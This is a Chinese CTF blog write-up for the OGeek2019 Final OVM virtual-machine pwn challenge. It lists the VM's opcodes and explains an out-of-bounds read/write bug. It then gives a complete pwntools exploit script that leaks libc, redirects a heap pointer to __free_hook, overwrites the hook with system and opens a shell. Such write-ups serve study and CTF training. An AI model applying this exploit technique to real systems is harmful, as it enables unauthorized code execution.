一道题目入门VMpwn

最新推荐文章于 2023-08-06 21:43:46 发布
最新推荐文章于 2023-08-06 21:43:46 发布
阅读量328 收藏
点赞数
分类专栏: CTF-pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40712959/article/details/115709633
版权

一道题目学习VMpwn

原理

VMpwn 程序通常都是模拟一套虚拟机,对用户输入的opcode进行解析,模拟程序的执行,故VMpwn常见设计如下:

  • 初始化分配模拟寄存器空间(reg)
  • 初始化分配模拟栈空间(stack)
  • 初始化分配模拟数据存储空间(data)
  • 初始化分配模拟机器指令(opcode)空间(text)

[OGeek2019 Final]OVM

程序采用32bit定长指令,每个操作码、操作数均为8bit,其格式为:

| opcode | dst | op1 | op2 |

程序具体指令参考如下:

opcode含义指令
0x10reg[dst]=op2mov
0x20op2==0?reg[dst]=1:reg[dst]=0test
0x30reg[dst]=memory[reg[op2]]mov reg1,[reg2]
0x40memory[reg[op2]]=reg[dst]mov [reg1],reg2
0x50stack[rsp]=reg[dst];rsp=rsp+4;push
0x60rsp=rsp-4;reg[dst]=stack[rsp];pop
0x70reg[dst] = reg[op2] + reg[op1]add
0x80reg[dst]=reg[op1]-reg[op2]sub
0x90reg[dst] = reg[op2] & reg[op1]and
0xa0reg[dst] = reg[op2]or
0xb0reg[dst] = reg[op2] ^ reg[op1]xor
0xc0reg[dst] = reg[op1] << reg[op2]
0xd0reg[dst] = reg[op1] >> reg[op2]
0xe0exit+printf

程序利用思路

  1. 如下图,程序在内存读写的时候,均没有对输入的值做边界检查,如存在oob,可以利用该漏洞实现任意地址的读写,如读取got泄露libc
  2. 在这个程序里可以memory地址为0x202060,程序申请了glibc堆空间,该堆地址保存在comment处(地址0x202040),且用户可向该空间写入任意数据,故可以改写comment指向free_hook-0x8,填充free_hook为system,getshell
  3. 参考LOW博客,通过oob将stderror地址放入寄存器,通过偏移计算freehook,并将freehook填入comment,利用exit+printf泄露libc,得system地址,改写freehook为system从而获取shell

在这里插入图片描述

exp

from pwn import *

#r = remote("node3.buuoj.cn", 29381)
r = process("./pwn")

context(log_level = 'debug', arch = 'amd64', os = 'linux')
DEBUG = 0
if DEBUG:
	gdb.attach(r,
	'''	
	b *$rebase(0xCFE)
	x/10gx $rebase(0x242060)
	c
	''')

elf = ELF("./pwn")
#libc = ELF('/home/hhh/桌面/heap/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
libc=elf.libc
one_gadget_16 = [0x45216,0x4526a,0xf02a4,0xf1147]
log.success("malloc:"+hex(libc.sym[b'malloc']))
log.success("system:"+hex(libc.sym[b'system']))
log.success("free_hook:"+hex(libc.sym[b'__free_hook']))


def code_generate(code, dst, op1, op2):
	res = code<<24
	res += dst<<16
	res += op1<<8
	res += op2
	return res

r.recvuntil("PC: ")
r.sendline('0')
r.recvuntil("SP: ")
r.sendline('1')
r.recvuntil("CODE SIZE: ")
r.sendline('24')
r.recvuntil("CODE: ")
r.sendline(str(code_generate(0x10, 0, 0, 26))) #reg[0] = 26 (stderr) ,该OVM模拟的是32位机器,stderror地址为$rebase(0x201ff8),而memory地址为$rebase(0x202060),二者之间差距为0x68,注意该ovm模拟32bit机器,所以reg每一个偏移为4,故二者偏移为0x68/4=26
r.sendline(str(code_generate(0x80, 1, 1, 0))) #reg[1] = reg[1] - reg[0]
r.sendline(str(code_generate(0x30, 2, 0, 1))) #reg[2] = memory[reg[1]]  #stderror地址的低4bytes
r.sendline(str(code_generate(0x10, 0, 0, 25))) #reg[0] = 25
r.sendline(str(code_generate(0x10, 1, 0, 0))) #reg[1] = 0
r.sendline(str(code_generate(0x80, 1, 1, 0))) #reg[1] = reg[1] - reg[0]
r.sendline(str(code_generate(0x30, 3, 0, 1))) #reg[3] = memory[reg[1]] #stderror地址的高4bytes
r.sendline(str(code_generate(0x10, 4, 0, 1))) #reg[4] = 1
r.sendline(str(code_generate(0x10, 5, 0, 12))) #reg[5] = 12
r.sendline(str(code_generate(0xC0, 4, 4, 5))) #reg[4] = reg[4]<<reg[5]#reg4=0x1000
r.sendline(str(code_generate(0x10, 5, 0, 0xA))) #reg[5] = 0xA
r.sendline(str(code_generate(0x10, 6, 0, 4))) #reg[6] = 4
r.sendline(str(code_generate(0xC0, 5, 5, 6))) #reg[5] = reg[5]<<reg[6]
r.sendline(str(code_generate(0x70, 4, 4, 5))) #reg[4] = reg[4]+reg[5]#reg4=0x10a0
r.sendline(str(code_generate(0x70, 2, 4, 2))) #reg[2] = reg[4]+reg[2]#reg2为stderror的低4bytes,stderror距离freehook的偏移为0x10a8,这里使用0x10a0,求得freehook-0x8的位置
r.sendline(str(code_generate(0x10, 4, 0, 8))) #reg[4] = 8
r.sendline(str(code_generate(0x10, 5, 0, 0))) #reg[5] = 0
r.sendline(str(code_generate(0x80, 5, 5, 4))) #reg[5] = reg[5] - reg[4]
r.sendline(str(code_generate(0x40, 2, 0, 5))) #memory[reg[5]]=reg[2] #改comment指向free_hook
r.sendline(str(code_generate(0x10, 4, 0, 7))) #reg[4] = 7
r.sendline(str(code_generate(0x10, 5, 0, 0))) #reg[5] = 0
r.sendline(str(code_generate(0x80, 5, 5, 4))) #reg[5] = reg[5] - reg[4]
r.sendline(str(code_generate(0x40, 3, 0, 5))) #memory[reg[5]]=reg[3]
r.sendline(str(code_generate(0xE0, 0, 1, 1))) #exit

r.recvuntil("R2: ")
low = int(r.recvuntil('\n').strip(), 16) + 8
r.recvuntil("R3: ")
high = int(r.recvuntil('\n').strip(), 16)
free_hook = (high<<32)+low
log.success("free_hook:"+hex(free_hook))
libc.address = free_hook - libc.sym[b'__free_hook']
system = libc.sym[b'system']
r.recvuntil("HOW DO YOU FEEL AT OVM?\n")
r.sendline(b'/bin/sh\x00'+p64(system))

r.interactive()
hhhnoone
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ubuntu python 入门题目
04-16
1. ssh命令是干什么用的 2. 需要使用ssh命令需要安装什么软件【ubuntu中】 3. 使用ssh命令登录 hots: 192.168.1.2, username: user,的命令怎么写? 4. 查看电脑的ip的命令是什么?...6. 怎么为一个变量动态赋值 ...
__malloc_hook和__free_hook劫持原理
Grxer的博客
03-20 938
Hook即钩子,截获API调用的技术,是将执行流程劫持到你自己的代码。刚开始在Ubuntu22上做实验,一直不成功,又换了kali,还是不行,最后发现__free_hook,__malloc_hook,__realloc_hook,_after_morecore_hookg在libc-2.34的patch中被移除了,换了Ubuntu16 libc版本2.23,但是发现只是在ld链接时会找不到definition,也就是无法通过链接的环节,但是在libc库里还是有的,可能是考虑之前使用hook程序的兼容。
pwn题堆利用的一些姿势 -- free_hook
lifanxin的博客
04-16 4665
free_hook概述初级必备姿势常规搭配姿势按需进阶姿势总结 pwn题堆利用的一些姿势 – malloc_hook 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上的堆指针;开了Full RELRO的话,则意味着我们无法修改got表,导致无法修改其它函数got表指向system,进一步获取到shell
津门杯2021CTF pwn解
qq_39948058的博客
08-26 476
前言:这个题一开始调通了,但是不知道正确的libc版本,远程没有打通,最后听了一下libc版本是11.4的libc2.23版本,才打通,题很多洞,比较经典的是edit的READ容易写。写到freehook为onegadget即可,tcl,只解了一道题,时间原因第二道pwn题也没看,噗。。 漏洞点: 漏洞点这两个地方,他们都是在bss段里,而且位置比较临近可以直接考虑一下任意写,当时没太注意这个点,直接doublefree的,发现只给了4个chunk,所以没能构建出,又审计了一下edit R.
IO_file attack(_IO_str_finish)以及 free_hook用法
carol2358的博客
08-04 1064
题目是0ctf_2017_babyheap 漏洞是堆溢出 free_hook 参考链接: https://xz.aliyun.com/t/7020 https://bbs.pediy.com/thread-230028.htm https://bbs.pediy.com/thread-246786.htm free_hook在libc2.23中用起来比较费劲,2.27中用的比较多 free_hook可以在og用不了的时候来system(binsh),但我为什么不realloc_hook呢? 因为f
[OGeek2019 Final]OVM(简易虚拟机逃逸)
m0_51251108的博客
10-16 737
vmpwn入门
Java入门题目集合
07-28
Java编程是IT领域中最基础且重要的技能之一,对于初学者来说,通过解决一系列的编程题目可以有效提升理解和应用能力。以下是一些基于给定题目所涵盖的Java知识点的详细解释: 1. **数字竖式计算**:这道题目涉及到...
B2001 入门测试题目
最新发布
10-21
洛谷 B2001 入门测试题目 C++代码 洛谷题目代码截图,如果要源代码的话私信我 有什么不懂的一定要问!!!不懂就问!!!
入门WEB题目类型 思维导图
02-01
入门WEB题目类型 思维导图
数据结构入门题目(力扣)
03-09
记录自己14天在力扣的数据结构入门的做题过程,部分解题思路是自己想出来的,部分是参考了对应题目的评论区网友的思路. 入门题目有:存在重复元素,最大子数组和,两数之和,合并两个有序数组,两个数组的交集 II,买卖股票...
Antctf-vmpwn
03-15
Antctf-real_vmpwn写 该主题通过对vmware dhcp组件进行了神奇的修改,介绍了旧版本中的cve-2020-3947 UAF漏洞和静默固定变量未初始化的漏洞。 此漏洞组合可能导致较低版本(<15.1.2)的实际转义,因此将该漏洞命名为real_vmpwn
[OGeek2019 Final]OVM
weixin_52878095的博客
03-19 3870
静态分析 拿到题目后第一件事先检查程序的保护机制 看到程序除了canary保护以为,其他保护都开了,丢到IDA里面静态分析,程序先是为comment参数分配了一块0x8c大小的内存,然后让我们输入指令起始位置和栈起始位置,然后将指令起始位置赋值给reg[13],将栈起始位置赋值给reg[15],而且指令的数量不能大于0x10000,然后就是需要我们一条一条输入指令,输入完毕后就读取指令并执行,最后会有一个向comment中写入数据然后调用sendcomment函数 然后我们分别看一下fetch() /
[OGeek2019 Final]OVM——详细入门VM pwn
fzucaicai的博客
08-06 938
仔细分析代码都可以发现,这些操作都没有对数组的下标进行检查,这样会导致什么后果呢,举个例子,如果有一个重要数据B存在数组array[10]的内存前面,如果不对数组的下标进行检查的话,那么我就可以构造array[-1]并输出,就可以得到B的内容了。也就是说,我们给程序输入一串指令,这个程序会有自己独特的,对代码的理解,并进行像分解成机器码那样,执行,而像寄存器,栈空间,存储空间都是程序自己设计的,而不是系统分配的。这两个条件判断语句的目的是确保在进行内存释放操作之前,所提供的指针和大小都是有效的。
[OGeek2019 Final]OVM(简易虚拟机逃逸)
seaaseesa的博客
05-01 1155
[OGeek2019 Final]OVM 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,是一个虚拟机 其中,这里这条mov reg的指令比较重要 还有这里mov memory的指令也比较重要 这里两处,都存在下标越界,通过查看汇编指令可知,memory和reg都是有符号的数据数组。 因此,利用reg[out] = memory[-X],可以向上越界,将数...
OGeek_2019_Final OVM题解
lifanxin的博客
05-24 757
WP程序分析程序主逻辑分析虚拟机指令分析利用思路exp总结 程序分析   本题目一道典型的虚拟机题目,通过这道题目,我们可以学习一下VM pwn题的分析技巧和利用思路。   该题目程序和远程环境可以在buuoj上找到,下面老规矩先检查下程序信息,64位小端程序,没有开启栈保护。   做虚拟机的pwn题,我们可以分两大步骤进行,首先先分析一下这个程序是如何实现虚拟机功能的,也就是程序自身的大逻辑,然后我们再详细分析程序虚拟出来的指令,分析指令的过程可能会比较耗时,需要耐心。 程序主逻辑分析   我们首先来
VMPWN入门系列-1
YJ_12340的博客
07-27 1009
这是一道基础的VM相关题目VMPWN入门级别题目。前面提到VMPWN一般都是接收字节码然后对字节码进行解析,但是这道题目不接受字节码,它接收字节码的更高一级语言:汇编。程序直接接收类似”mov”、”add”之类的指令,可以把这道题目看作是一个执行汇编语言的处理器,相比于解析字节码的VM,逆向难度要大大减小。非常适合入门
VMPWN入门
Stella_Leo的博客
08-25 678
title: vmpwn author: Ev3r date: 2021-08-19 20:28:14 tags: vmpwn categories: vmpwn vmpwn 当作一个vmpwn入门了,一些设计基础先不谈了,直接来干货。 vmpwn常见设计 初始化分配模拟寄存器空间 初始化模拟栈空间 初始化分配模拟数据存储(buffer)空间 (data段) 初始化伪OPCODE空间 (text段) 常见流程 输入opcode 有一个分析器,循环分解我们输入的opcode来翻译出汇编指令,多为出.
VMPWN
Amalllの博客
11-11 1033
1.虚拟机保护技术 所谓虚拟机保护技术,是指将代码翻译为机器和人都无法识别的一串伪代码字节流;在具体执行时再对这些伪代码进行一一翻译解释,逐步还原为原始代码并执行。这段用于翻译伪代码并负责具体执行的子程序就叫作虚拟机VM(好似一个抽象的CPU)。它以一个函数的形式存在,函数的参数就是字节码的内存地址。 2.VStartVM 虚拟机的入口函数,对虚拟机环境进行初始化 3.VMDispather 解释opcode,并选择对应的Handler函数执行,当Handler执行完后会跳回这里,形成一个循环
Java经典算法入门:40道实战题目解析
这些题目涵盖了数学序列、数据结构以及基本算法的概念,适合用来巩固基础理论知识和实践技能。 【程序1】涉及到斐波那契数列问题,这是一个典型的递归问题。题目要求计算从第3个月开始的兔子数量,实际上对应的就是...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值